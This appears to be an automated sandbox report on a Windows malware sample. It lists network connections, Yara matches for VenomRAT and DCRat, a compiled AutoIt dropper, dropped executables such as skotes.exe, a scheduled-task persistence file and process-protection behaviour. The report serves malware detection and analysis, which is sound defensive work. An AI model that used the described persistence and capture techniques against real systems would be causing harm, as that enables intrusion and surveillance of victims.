Source: firefox.exe, 00000020.00000003.2991618595.000001D7660D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000020.00000003.3234107226.000001D766079000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001E.00000002.2820894503.0000020D9578A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2829022376.000002242D56F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50295
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50297
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50299
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 50299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 50318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50283
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 50358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50170
Source: unknown	Network traffic detected: HTTP traffic on port 50302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50293
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50224
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 50224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 50356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50322 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443

Source: unknown	HTTPS traffic detected: 104.21.51.88:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:50016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.241:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.88:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.193.91:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.4:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.4:50318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:50320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50359 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected VenomRAT

Source: Yara match	File source: 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZiYbk6W.exe PID: 3992, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP

Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown

Binary is likely a compiled AutoIt script file

Source: 855be7cecf.exe, 00000010.00000000.2771678903.0000000000152000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_9e398fae-c
Source: 855be7cecf.exe, 00000010.00000000.2771678903.0000000000152000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_05a579cf-3

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 2befb05fec.exe.6.dr	Static PE information: section name:
Source: 2befb05fec.exe.6.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name:
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name: .idata
Source: H9TU4oY[1].exe.6.dr	Static PE information: section name:
Source: H9TU4oY.exe.6.dr	Static PE information: section name:
Source: H9TU4oY.exe.6.dr	Static PE information: section name: .idata
Source: H9TU4oY.exe.6.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name:
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name: .idata
Source: ZiYbk6W[1].exe.6.dr	Static PE information: section name:
Source: ZiYbk6W.exe.6.dr	Static PE information: section name:
Source: ZiYbk6W.exe.6.dr	Static PE information: section name: .idata
Source: ZiYbk6W.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name:
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name: .idata
Source: c1ca3b12e5.exe.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: 232a1df2aa.exe.6.dr	Static PE information: section name:
Source: 232a1df2aa.exe.6.dr	Static PE information: section name: .idata
Source: 232a1df2aa.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D40ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	14_2_6D40ED10
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D44B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	14_2_6D44B700
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D44B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	14_2_6D44B910
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D44B8C0 rand_s,NtQueryVirtualMemory,	14_2_6D44B8C0
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D3EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	14_2_6D3EF280
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	Code function: 14_2_6D6162C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	14_2_6D6162C0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F8860	0_2_006F8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F7049	0_2_006F7049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F78BB	0_2_006F78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C8101	0_2_007C8101
